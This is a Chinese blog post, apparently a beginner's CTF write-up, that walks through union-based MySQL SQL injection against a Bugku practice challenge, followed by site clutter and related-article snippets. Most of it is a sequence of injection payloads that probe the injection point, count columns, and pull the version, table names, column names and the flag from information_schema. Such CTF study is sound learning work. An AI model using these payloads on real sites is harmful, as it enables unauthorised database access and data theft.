网络与信息安全工程师从业之旅-SQL注入001

最新推荐文章于 2024-04-28 10:21:10 发布
最新推荐文章于 2024-04-28 10:21:10 发布
阅读量288 收藏
点赞数
分类专栏: SQL注入 文章标签: 体会心得
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wm_nnxx/article/details/96422564
版权

SQL注入-MySql 数字注入
参考bugkuctf:http://123.206.87.240:8002/chengjidan/index.php

验证注入点是否存在:
payload:
1 返回正常
1’ 不显示结果
1" 结果显示正常
1’ and ‘1’='1 返回正常

确定查询字段数(使用二分法确认):
payload:
1’ order by 5–空格 无返回
1’ order by 4–空格 返回正常
确认字段数为4

确认回显位:
payload:
1’ and ‘1’=‘2’ union select 1,2,3,4 --空格
确认回显位为1,2,3,4

确认数据库版本,数据库名
1’ and ‘1’=‘2’ union select version(),database(),3,4 --空格
在这里插入图片描述数据库版本为5.5.34,数据库名为skctf_flag

确认数据库表名(通过修改 limit 0(递增),1,每次只爆出一个表名)
1’ and ‘1’=‘2’ union select table_name,2,3,4 from information_schema.tables where table_schema=database() limit 0,1–空格
爆出全部表名
1’ and ‘1’=‘2’ union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()–空格
在这里插入图片描述
确认数据库列名(同上,但是表名有时需要转换为16进制)
1’ and ‘1’=‘2’ union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema=database() and table_naem=‘fl4g’–空格

1’ and ‘1’=‘2’ union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema=database() and table_name=0x666c3467–空格
在这里插入图片描述确认列名下信息
1’ and ‘1’=‘2’ union select skctf_flag,2,3,4 from fl4g–空格
在这里插入图片描述group_concat(table_name)挺好用。

梦想成为安全大佬的男人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 - 一名合格的Web安全工程师之成长路径
Coisini的博客
05-30 2733
最近经常听到公司的招聘专员反馈应聘者简历“水分”太大,尤其是技术岗位,例如Web安全工程师,明明是初级阶段的菜鸟,就敢写资深Web安全工程师;在几个项目做一些基础打杂的工作,就敢写带过团队,项目经验丰富;挖过几个低危漏洞,就称自己是精英白帽…其实,那点花架子面试官早就看出来了。 你以为在网上找一些零散的知识点学学,在面试前狂补一遍常见问题,简历做漂亮些,就能轻松找到工作了?错,大错特错! Web...
中职网络安全题目逆向-SQL注入环境创建-题目环境
09-21
自己根据网上的题目解答,逆向制作的SQL注入的题目环境。可以根据解答方法进行练习 使用方法: 用phpstudy2016配置 将解压后的文件夹放在网站根目录下 将解压后的文件夹lpplpp(这个里面是数据库)拷贝到数据库所在...
回顾信息安全的发展历程
weixin_34023982的博客
09-18 2572
回顾信息安全的发展历程 Jack zhai     信息安全的概念的出现远远早于计算机的诞生,但计算机的出现,尤其是网络出现以后,信息安全变得更加复杂,更加“隐形”了。现代信息安全区别于传统意义上的信息介质安全,是专指电子信息安全。 随着IT技术的发展,各种信息电子化,更加方便地获取、携带与传输,相对于传统的信息安全保障,需要更加有力的技术保障,而不单单是对接触信息的人和信息本身进行管理,介质本...
第九届全国大学生信息安全竞赛之
flx413的博客
08-16 1704
有幸参加了第九届全国大学生信息安全竞赛,前几天刚落下帷幕,这也是我第一次来上海,决赛地点在上海交通大学。我参加的是作品赛,4月底是海选,会要求交一个作品,经过筛选挑选出入围决赛的队伍赴上海交大答辩评选。我们队有三人:         小康(队长):负责主程序初始化、UI设计、关键算法、数据库设计等         我:关键算法、其他算法的实现、Web界面修改、作品性能测试等        
常见的IT笔试知识题
jianghuihong2012的专栏
03-24 1185
协议端口问题 一、POP3收邮件: POP3: 110 POP3 SSL: 995 二、IMAP收邮件: IMAP: 143 IMAP SSL: 993 三、SMTP发邮件: SMTP: 25 SMTP SSL: 465 SMTP TLS: 587 HTTP协议问题 下面是常见的HTTP状态码: 200 - 请求成功301 - 资源(网页等
关于sql注入的一些个人心得
weixin_34250434的博客
12-26 471
sql 注入就是通过用户提交的数据中加入一些特殊字符如单引号等来影响sql命令的行为 这些网上都有很多说明,只要搜一下都会有很多。 我这里要说的是大家可能会不注意的地方,大部分新手会认为sql注入只是通过地址栏里的参数来注入好一点的会知道通过表单提交的数据来注入,很少有人会注意到通过一些隐藏的域或都不可输入的表单项来注入 其实像<select> checkbox radio &l...
信息安全从业者工作规划及能力建设
博大汽车信息安全
03-10 3581
首先需要具备整个信息安全工作的总体框架,企业信息安全做什么?怎么做?当你知道做什么,就知道应该去学些什么?
网络安全】一篇文章带你了解CTF那些事儿
2401_84215240的博客
04-26 674
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。CTF竞赛模式具体分为解题模式、攻防模式和混合模式。在解题模式下,参赛者需要通过互联网或现场网络参与解决网络安全技术挑战题目,以获取分数和时间排名;
适合自学的网络安全基础技能“蓝宝书”:《CTF那些事儿》_高中生ctf入门书
weixin_42340783的博客
04-28 1493
本书由顶级CTF战队Lancet的指导教师李舟军教授和核心团队成员历时4年打磨而成,创新性地提出了新的CTF知识学习框架,体现了李舟军教授多年的教学精髓和带队经验。书中涵盖PWN、逆向、Web等常见题目,并系统性总结了CTF比赛中工控安全的考察方式。不仅讲授基础知识和操作技能,还探讨CTF赛题的本质,着重阐述了面对不同类型题目时的分析思路和方法。同时,书中针对CTF比赛学习的编排方式,符合我国主流的计算机学科知识体系结构,李舟军教授结合学生的实战经验,为网络安全空间爱好者提供了一本教科书式的实践指导手册。
在互联网上,没有人知道你是一条狗?
热门推荐
信息安全-企业安全-数据安全
08-22 3万+
1993 年,《纽约客》(The New Yorker)杂志刊登一则由彼得·施泰纳(Peter Steiner)创作的漫画:标题是【On the Internet, nobody knows you’re a dog.】 这则漫画中有两只狗:一只黑狗站在电脑椅上,爪子扶着键盘。它望向站在地上、表情迷茫的另一只狗,兴奋地说:「在互联网上,没人知道你是一条狗。 (On the Internet, nobody knows you’re a dog.)画中那只狗的台词随即成了 IT 界广为流传的经典笑话。 那个
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
信息安全技术之SQL注入式攻击
12-17
信息安全技术
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
仅仅为了大家更好的学习!
网络安全技术13SQL注入.pptx
11-12
网络安全技术之SQL注入 SQL注入是一种常见的网络攻击手段,它通过在Web应用程序中插入恶意的SQL代码来攻击数据库,从而获取敏感信息或控制数据库。本文将对SQL注入进行详细的介绍,包括其概念、类型、攻击方法、...
“推荐系统”相关资源推荐
06-14
推荐了国内外对推荐系统的讲解相关资源
全渠道电商平台业务中台解决方案.pptx
06-14
全渠道电商平台业务中台解决方案.pptx
云计算企业私有云平台建设方案.pptx
06-14
云计算企业私有云平台建设方案.pptx
通过CNN卷积神经网络对盆栽识别-含图片数据集.zip
最新发布
06-14
本代码是基于python pytorch环境安装的。 下载本代码后,有个requirement.txt文本,里面介绍了如何安装环境,环境需要自行配置。 或可直接参考下面博文进行环境安装。 https://blog.csdn.net/no_work/article/details/139246467 如果实在不会安装的,可以直接下载免安装环境包,有偿的哦 https://download.csdn.net/download/qq_34904125/89365780 安装好环境之后, 代码需要依次运行 01数据集文本生成制作.py 02深度学习模型训练.py 和03pyqt_ui界面.py 数据集文件夹存放了本次识别的各个类别图片。 本代码对数据集进行了预处理,包括通过在较短边增加灰边,使得图片变为正方形(如果图片原本就是正方形则不会增加灰边),和旋转角度,来扩增增强数据集, 运行01数据集文本制作.py文件,会就读取数据集下每个类别文件中的图片路径和对应的标签 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地
wireshark-sql注入探测
06-10
Wireshark是一个流量分析工具,可以用于SQL注入探测。下面是一些探测SQL注入攻击的步骤: 1. 启动Wireshark,并开始捕获网络流量。 2. 使用过滤器来过滤HTTP/HTTPS流量,以便找到可能存在SQL注入攻击的流量。 3. 找到HTTP/HTTPS请求中的参数,这些参数可能会受到SQL注入攻击。可以通过查看HTTP请求和响应报文来确定参数的名称和值。 4. 对于可能受到SQL注入攻击的参数,可以使用Wireshark的“Follow TCP Stream”功能,查看完整的HTTP请求和响应报文,以便确认是否存在SQL注入攻击。 5. 在HTTP请求中,可以检查参数的类型和格式,以查看是否存在潜在的SQL注入漏洞。例如,可以检查参数是否为数字类型或字符串类型,是否包含特殊字符等。 6. 在HTTP响应中,可以检查响应的内容,以查看是否存在异常或错误信息,例如SQL语法错误或数据库连接错误等。 7. 如果发现SQL注入漏洞,需要及时修复漏洞,例如对输入参数进行严格的输入检查和过滤,使用参数化查询等措施,以避免SQL注入攻击。 总之,Wireshark是一个功能强大的流量分析工具,可以用于SQL注入探测。通过对HTTP/HTTPS流量的分析和检查,可以发现潜在的SQL注入漏洞,并及时修复漏洞,以保护应用程序的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值